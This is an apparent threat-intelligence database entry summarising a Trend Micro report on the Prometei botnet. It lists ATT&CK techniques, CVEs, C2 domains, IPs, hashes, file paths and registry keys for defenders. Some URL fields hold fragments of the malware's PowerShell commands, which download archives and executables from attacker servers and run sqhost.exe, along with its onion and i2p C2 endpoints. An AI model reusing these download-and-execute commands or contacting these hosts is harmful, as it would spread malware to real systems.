ioc[.]one - OSINT Cyber Threat Intelligence Database

Unmasking Prometei A Deep Dive Into Our MXDR Findings

Tags

cmtmf-attack-pattern:	Masquerading
country:	Brazil Indonesia Russia
attack-pattern:	Data Direct Model Botnet - T1583.005 Botnet - T1584.005 Credentials - T1589.001 Dns - T1071.004 Dns - T1590.002 Dns Server - T1583.002 Dns Server - T1584.002 Domains - T1583.001 Domains - T1584.001 Ip Addresses - T1590.005 Malware - T1587.001 Malware - T1588.001 Masquerading - T1655 Powershell - T1059.001 Server - T1583.004 Server - T1584.004 Software - T1592.002 Ssh - T1021.004 System Services - T1569 Web Shell - T1505.003 Windows Service - T1543.003 Tool - T1588.002 Vulnerabilities - T1588.006 Brute Force - T1110 Connection Proxy - T1090 Credential Dumping - T1003 Masquerading - T1036 Powershell - T1086 Web Shell - T1100 Masquerading

Show in Graph

Common Information

Type	Value
UUID	f9771417-b45b-4042-a478-42f4c152e37a
Fingerprint	94e9b8fc25378e81
Analysis status	DONE
Considered CTI value	2
Text language
Published	Oct. 23, 2024, midnight
Added to db	Oct. 23, 2024, 3:28 p.m.
Last updated	Nov. 17, 2024, 6:55 p.m.
Headline	Unmasking Prometei: A Deep Dive Into Our MXDR Findings
Title	Unmasking Prometei A Deep Dive Into Our MXDR Findings
Detected Hints/Tags/Attributes	112/3/158

Source URLs

	Redirection	Url
Details	Source	https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html

URL Provider

Details	Provider	Source level domain
Details	trendmicro.com	www.trendmicro.com

RSS Feed

Details	Id	Enabled	Feed title	Url	Added to db
Details	119	✔	Trend Micro Research, News and Perspectives	https://feeds.feedburner.com/TrendMicroSimplySecurity	2024-08-30 22:08

Attributes

Details	Type	#Events	Value
Details	CVE	197	cve-2019-0708
Details	CVE	126	cve-2021-27065
Details	CVE	92	cve-2021-26858
Details	Domain	1	210.160.map
Details	Domain	4	p2.feefreepool.net
Details	Domain	2	xinchaocacebm.com
Details	Domain	2	xinchaocacebd.com
Details	Domain	2	xinchaobjcebl.com
Details	Domain	2	xinchaobjcebj.net
Details	Domain	2	xinchaocacebp.net
Details	Domain	2	xinchaocacebi.net
Details	Domain	2	xinchaobjcebi.net
Details	Domain	2	xinchaobjcebe.org
Details	Domain	2	xinchaocacebo.org
Details	Domain	2	xinchaocacebd.net
Details	Domain	2	xinchaobjcebn.org
Details	Domain	2	xinchaobjcebk.com
Details	Domain	2	xinchaocacebi.com
Details	Domain	2	xinchaocacebj.com
Details	Domain	2	xinchaobjcebb.com
Details	Domain	2	xinchaobjcebf.com
Details	Domain	1	appserv.zip
Details	Domain	4	appserv180.zip
Details	Domain	6	gb7ni5rgeexdcncj.onion
Details	Domain	3	mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero
Details	File	1	c:\windows\uplugplay c:\windows\netwalker c:\windows\updates1.7z
Details	File	1	c:\windows\updates2.7z
Details	File	1	c:\windows\mshlpda32.dll
Details	File	1	c:\windows\7z.exe
Details	File	40	7z.exe
Details	File	1	updates1.7z
Details	File	1	updates2.7z
Details	File	6	sqhost.exe
Details	File	7	libssp-0.dll
Details	File	12	libcrypto-1_1.dll
Details	File	2	windrlver.exe
Details	File	1	miwalk64.exe
Details	File	1	miwalk32.exe
Details	File	3	c:\windows\zsvc.exe
Details	File	2	c:\windows\sqhost.exe
Details	File	409	c:\windows\system32\cmd.exe
Details	File	2125	cmd.exe
Details	File	2	c:\windows\dell\miwalk.exe
Details	File	2	c:\windows\dell\ssldata2.dll
Details	File	142	wmiprvse.exe
Details	File	1	c:\windows\updates1.7z
Details	File	1	c:\windows\7z.dll
Details	File	1	c:\windows\winhlpx64.exe
Details	File	1	c:\windows\ssldata2.dll
Details	File	15	k.php
Details	File	4	zsvc.exe
Details	File	20	7z.dll
Details	File	3	7z32.dll
Details	File	3	7z32.exe
Details	File	1	std.7z
Details	File	3	std2.7z
Details	File	1208	powershell.exe
Details	File	2	'7z.dll
Details	File	2	'7z.exe
Details	File	1	'std.7z
Details	File	2	c:\windows\dell\7z.exe
Details	File	1	walker.ini
Details	File	10	dwn.php
Details	File	1	c:\windows\dell\walker.ini
Details	File	9	socks.exe
Details	File	1	setup_gitlog.txt
Details	File	2	c:\windows\temp\setup_gitlog.txt
Details	File	2	c:\windows\dell\rdpciip.exe
Details	File	30	rdpclip.exe
Details	File	1	c:\windows\dell\nethelper4.exe
Details	File	1	c:\windows\dell\windrlver.exe
Details	File	3	srch.7z
Details	File	27	searchindexer.exe
Details	File	2	'searchindexer.exe
Details	File	1	'srch.7z
Details	File	6	desktop.txt
Details	File	3	c:\windows\dell\desktop.dat
Details	File	2	c:\windows\dell\searchindexer.exe
Details	File	1	c:\windows\dell\appserv.zip
Details	File	2	c:\windows\dell\7z.dll
Details	File	1	c:\programdata\microsoft\appserv\www\index.php
Details	File	3	appserv180.zip
Details	File	1	c:\windows\dell\7z x c:\windows\dell\appserv.zip
Details	File	1	appserv.zip
Details	File	1	ssimple.php
Details	File	1	shell-abc123def456.php
Details	File	1	rnd+'.php
Details	File	1	c:\programdata\microsoft\appserv\www\ssimple.php
Details	File	62	taskhost.exe
Details	File	33	php.ini
Details	File	1	c:\windows for accessibility and start the ktmrmsvc service to run taskhost.exe
Details	File	1	c:\programdata\microsoft\appserv\php5\php.ini
Details	File	1	'appserv180.zip
Details	File	1	c:\windows\dell\msdtc.exe
Details	File	2	smcard.exe
Details	File	55	msdtc.exe
Details	File	1	c:\windows\dell\smcard.exe
Details	File	1	mshlpda32.dll
Details	File	1	c:\windows c:\windows\system32\cmd.exe
Details	File	1	c:\windows delete exisiting uplugplay service and a create uplugplay service c:\windows\system32\cmd.exe
Details	File	1	%appdata%\intel\sqhost.exe
Details	File	1	c:\users\dyituser_764\appdata\roaming\intel\sqhost.exe
Details	File	5	rdpciip.exe
Details	File	1	netsync_v2.exe
Details	File	1	nvstub_v2.exe
Details	File	1	netdefender.exe
Details	File	1	winhlpx64.exe
Details	File	4	miwalk.exe
Details	File	1	c:\windows\dell\slldata2.dll
Details	File	2	rdclip.exe
Details	File	3	nvsync.exe
Details	sha1	2	962f3d0b35b9ff68cdba31a039ead12b5789e7f6
Details	sha1	1	344faf61c3eb76f4a2fb6452e83ed16c9cce73e0
Details	sha1	2	20fea1314dbed552d5fedee096e2050369172ee1
Details	sha1	2	9280b1466527cb5b22c77c6cf42a3085a68dd326
Details	sha1	2	de16ad97be7fefcd7b830413e7d4d56ef96fb02b
Details	IPv4	2	196.7.210.6
Details	IPv4	2	196.7.209.178
Details	IPv4	4	103.40.123.34
Details	IPv4	4	88.198.246.242
Details	IPv4	2	103.41.204.104
Details	IPv4	295	8.8.8.8
Details	IPv4	2	187.79.243.171
Details	IPv4	2	196.7.210.160
Details	IPv4	8	10.0.0.254
Details	IPv4	1	10.17.0.42
Details	IPv4	2	180.169.1.207
Details	IPv4	2	155.207.200.242
Details	IPv4	1	10.17.0.254
Details	IPv4	2	134.88.5.200
Details	IPv4	2	187.133.137.81
Details	IPv4	2	145.239.200.92
Details	IPv4	2	142.4.205.155
Details	IPv4	2	89.163.213.192
Details	IPv4	2	45.194.35.180
Details	Url	2	http://103.40.123.34/k.php?b=_amd64
Details	Url	1	http://103.40.123.34/k.php?b=_amd64,psdn0020,504k45a188441r4ue',$p);$d=[io.file
Details	Url	2	http://103.41.204.104/7z32.dll
Details	Url	2	http://103.41.204.104/std2.7z
Details	Url	1	http://103.41.204.104/7z32.dll','7z.dll
Details	Url	1	http://103.41.204.104/7z32.exe','7z.exe
Details	Url	1	http://103.41.204.104/std2.7z','std.7z
Details	Url	1	http://103.41.204.104/dwn.php?d=walker.ini
Details	Url	2	http://103.41.204.104
Details	Url	1	http://103.41.204.104/srch.7z','srch.7z');}"&sqhost.exe
Details	Url	2	http://103.41.204.104/7z32.exe
Details	Url	2	http://45.194.35.180:180/appserv180.zip
Details	Url	2	https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi?r=9&i=n8q4y90o9t4mxh
Details	Url	1	https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi?r=3&i=9af2hyj240ifr4ug
Details	Url	4	http://p2.feefreepool.net/cgi-bin/prometei.cgi
Details	Url	3	http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi
Details	Url	4	http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Details	Url	6	https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Details	Windows Registry Key	2	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay
Details	Windows Registry Key	3	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
Details	Windows Registry Key	1	HKEY_LOCAL_MACHINE\SOFTWARE\Intel\Support
Details	Windows Registry Key	1	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fax
Details	Windows Registry Key	188	HKCU\Software\Microsoft\Windows\CurrentVersion\Run